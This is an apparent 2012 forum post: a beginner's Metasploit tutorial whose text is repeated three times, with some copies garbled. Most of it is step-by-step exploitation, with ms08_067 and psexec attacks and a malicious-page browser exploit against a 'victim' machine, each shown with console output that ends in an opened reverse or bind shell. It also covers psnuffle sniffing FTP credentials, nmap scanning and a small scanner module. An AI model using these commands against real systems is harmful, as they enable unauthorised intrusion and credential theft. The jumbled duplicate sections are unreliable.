08-11-2012, 08:37 AM
Hi everyone I decided to share with you an easy tutorial for metasploit easier to understand how to use.This tutorial personally i written is not copied.Let's start
Architecture Metasploit
![[Image: Msf_architecture_01.png]](http://www.offensive-security.com/w/images/b/be/Msf_architecture_01.png)
Metasploit's Filesystem is organized "on directories"
data: "variable" files used by Metasploit
documentation: provides dokumentacijuu for Metasploit
external: source code and independent "libraries"
lib: "main" part of the base
config: Metasploit modules
plugins: accessories that can be loaded during run time Metasploit
scripts: Meterpreter and other scripts
Defined as a module that uses the payload
Exploit payload without the auxiliary module
Payload contains the code that gets the "remote"
Encoder ensure that the payload arrives at the desired location, ie. it encodes
locations of modules
The primary "tree" module
/ opt/framework/msf3/modules /
User Specified "tree" module
~ / .msf4/modules /
Loading additional "timber" module
Use the-m option when you run the Console (metasploit-om)
msfcli provides a powerful command line interface in MSF
We use the assistance of the use of msfcli
example
Which shows that exploit windows/smb/ms08_067_netapi, victim IP address 192.168.1.102 and payload windows / shell / bind_tcp
Then we get the command shell
Msfconsole
![[Image: Msfcon-00.png]](http://www.offensive-security.com/w/images/8/86/Msfcon-00.png)
for help on using msfconsole
the use of
Binding to help msfconsole you'll see all the commands
Exploits
All exploits are divided into active and passive
Active exploits will be run on a specific host until a "complete" and shut down
Passive exploits those who are waiting for the victim's connection
An example of passive exploits
"Information Gathering"
One of these "applications" is Dradis Framework
more info go to http://dradisframework.org/
Starting Dradis
When the "adjusted" can be used for the purposes of Information Gathering
![[Image: Dradis.png]](http://www.offensive-security.com/w/images/9/99/Dradis.png)
port scanning
Then use db_import command that will automatically import nmap's file
Password Sniffing
One easy way is psnuffle
After that it run with the run
Going to write a simple TCP scanner that connects to the host port 4444th When you connect alive I sent a message along with the IP address
Use this
I hope I help someone
tutorial by me
)
Architecture Metasploit
Metasploit's Filesystem is organized "on directories"
data: "variable" files used by Metasploit
documentation: provides dokumentacijuu for Metasploit
external: source code and independent "libraries"
lib: "main" part of the base
config: Metasploit modules
plugins: accessories that can be loaded during run time Metasploit
scripts: Meterpreter and other scripts
Code:
Modules and locationsCode:
ExploitExploit payload without the auxiliary module
Code:
PayloadCode:
Encoderlocations of modules
The primary "tree" module
/ opt/framework/msf3/modules /
User Specified "tree" module
~ / .msf4/modules /
Loading additional "timber" module
Use the-m option when you run the Console (metasploit-om)
Code:
MsfcliCode:
msfcli -hWe use the assistance of the use of msfcli
example
Code:
msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.102 PAYLOAD=windows/shell/bind_tcp EWhich shows that exploit windows/smb/ms08_067_netapi, victim IP address 192.168.1.102 and payload windows / shell / bind_tcp
Then we get the command shell
Msfconsole
Code:
Msfconsole is the most popular MSF interface.for help on using msfconsole
the use of
Code:
use exploit/windows/smb/ms08_067_netapi
set LHOST-your ip
set RHOST-vincim
set PAYLOAD windows/shell/bind_tcp
exploitBinding to help msfconsole you'll see all the commands
Exploits
All exploits are divided into active and passive
Active exploits will be run on a specific host until a "complete" and shut down
Passive exploits those who are waiting for the victim's connection
Code:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS infernal
SMBPASS => infernal
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.102:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>An example of passive exploits
Code:
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.102:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.102:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.102:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>"Information Gathering"
One of these "applications" is Dradis Framework
more info go to http://dradisframework.org/
Code:
root@Infernal:~# cd /pentest/misc/dradis/
root@Infernal:/pentest/misc/dradis# ./start.shStarting Dradis
When the "adjusted" can be used for the purposes of Information Gathering
port scanning
Code:
msf > nmap -v -sV 192.168.1.0/24 -oA file
[*] exec: nmap -v -sV 192.168.1.0/24 -oA file
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19:29 MDT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 19:29
Scanning 101 hosts [1 port/host]
...
Nmap done: 256 IP addresses (16 hosts up) scanned in 499.41 seconds
Raw packets sent: 19973 (877.822KB) | Rcvd: 15125 (609.512KB)Then use db_import command that will automatically import nmap's file
Code:
msf > db_import filel.xml
[*] Importing 'Nmap XML' data
[*] Importing host 192.168.1.1
[*] Importing host 192.168.1.2
[*] Importing host 192.168.1.11
[*] Importing host 192.168.1.100
[*] Importing host 192.168.1.101Password Sniffing
One easy way is psnuffle
Code:
msf > use auxiliary/sniffer/psnuffleAfter that it run with the run
Code:
[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/framework/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/framework/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/framework/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /opt/framework/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> user / pass (220 3Com 3CDaemon FTP Server Version 2.0)Going to write a simple TCP scanner that connects to the host port 4444th When you connect alive I sent a message along with the IP address
Code:
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Infernaltcscanner',
'Version' => '1.0.0',
'Description' => 'example scanner',
'Author' => 'Infernal92',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(4444)
], self.class)
end
def run_host(ip)
connect()
hello = "im alive"
sock.puts(hello)
data = sock.recv(1024)
print_status("Received: #{data} from #{ip}")
disconnect()
end
endUse this
Code:
msf > use scanner/examplescanner.tcp
msf auxiliary(examplescanner.tcp) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(examplescanner) > run
[*] Received: Im alive from 192.168.1.100
[*] Auxiliary module execution completedI hope I help someone
tutorial by me
)(08-11-2012, 08:37 AM)Infernal92 Wrote: Hi everyone I decided to share with you an easy tutorial for metasploit easier to understand how to use.This tutorial personally i written is not copied.Let's start
Architecture Metasploit
Metasploit's Filesystem is organized "on directories"
data: "variable" files used by Metasploit
documentation: provides dokumentacijuu for Metasploit
external: source code and independent "libraries"
lib: "main" part of the base
config: Metasploit modules
plugins: accessories that can be loaded during run time Metasploit
scripts: Meterpreter and other scripts
Code:Modules and locations
Defined as a module that uses the payloadCode:Exploit
Exploit payload without the auxiliary module
Payload contains the code that gets the "remote"Code:Payload
Encoder ensure that the payload arrives at the desired location, ie. it encodesCode:Encoder
locations of modules
The primary "tree" module
/ opt/framework/msf3/modules /
User Specified "tree" module
~ / .msf4/modules /
Loading additional "timber" module
Use the-m option when you run the Console (metasploit-om)
msfcli provides a powerful command line interface in MSFCode:Msfcli
Code:msfcli -h
We use the assistance of the use of msfcli
example
Code:msfcli windows/smb/ms08_067_netapi RHOST=192.168.1.102 PAYLOAD=windows/shell/bind_tcp E
Which shows that exploit windows/smb/ms08_067_netapi, victim IP address 192.168.1.102 and payload windows / shell / bind_tcp
Then we get the command shell
Msfconsole
Code:Msfconsole is the most popular MSF interface.
for help on using msfconsole
the use of
Code:use exploit/windows/smb/ms08_067_netapi
set LHOST-your ip
set RHOST-vincim
set PAYLOAD windows/shell/bind_tcp
exploit
Binding to help msfconsole you'll see all the commands
Exploits
All exploits are divided into active and passive
Active exploits will be run on a specific host until a "complete" and shut down
Passive exploits those who are waiting for the victim's connection
Code:msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.1.102
RHOST => 192.168.1.102
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS infernal
SMBPASS => infernal
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.102[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.102:1073)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
An example of passive exploits
Code:msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.102:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.102:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.102:1078)
msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\victim\Desktop>
"Information Gathering"
One of these "applications" is Dradis Framework
more info go to http://dradisframework.org/
Code:root@Infernal:~# cd /pentest/misc/dradis/
root@Infernal:/pentest/misc/dradis# ./start.sh
Starting Dradis
When the "adjusted" can be used for the purposes of Information Gathering
port scanning
Code:msf > nmap -v -sV 192.168.1.0/24 -oA file
[*] exec: nmap -v -sV 192.168.1.0/24 -oA file
Starting Nmap 5.00 ( http://nmap.org ) at 2009-08-13 19:29 MDT
NSE: Loaded 3 scripts for scanning.
Initiating ARP Ping Scan at 19:29
Scanning 101 hosts [1 port/host]
...
Nmap done: 256 IP addresses (16 hosts up) scanned in 499.41 seconds
Raw packets sent: 19973 (877.822KB) | Rcvd: 15125 (609.512KB)
Then use db_import command that will automatically import nmap's file
Code:msf > db_import filel.xml
[*] Importing 'Nmap XML' data
[*] Importing host 192.168.1.1
[*] Importing host 192.168.1.2
[*] Importing host 192.168.1.11
[*] Importing host 192.168.1.100
[*] Importing host 192.168.1.101
Password Sniffing
One easy way is psnuffle
Code:msf > use auxiliary/sniffer/psnuffle
After that it run with the run
Code:[*] Auxiliary module execution completed
[*] Loaded protocol FTP from /opt/framework/msf3/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /opt/framework/msf3/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /opt/framework/msf3/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol URL from /opt/framework/msf3/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
[*] Successful FTP Login: 192.168.1.100:21-192.168.1.5:48614 >> user / pass (220 3Com 3CDaemon FTP Server Version 2.0)
Going to write a simple TCP scanner that connects to the host port 4444th When you connect alive I sent a message along with the IP address
Code:require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Infernaltcscanner',
'Version' => '1.0.0',
'Description' => 'example scanner',
'Author' => 'Infernal92',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(4444)
], self.class)
end
def run_host(ip)
connect()
hello = "im alive"
sock.puts(hello)
data = sock.recv(1024)
print_status("Received: #{data} from #{ip}")
disconnect()
end
end
Use this
Code:msf > use scanner/examplescanner.tcp
msf auxiliary(examplescanner.tcp) > set RHOSTS 192.168.1.100
RHOSTS => 192.168.1.100
msf auxiliary(examplescanner) > run
[*] Received: Im alive from 192.168.1.100
[*] Auxiliary module execution completed
I hope I help someone
tutorial by me
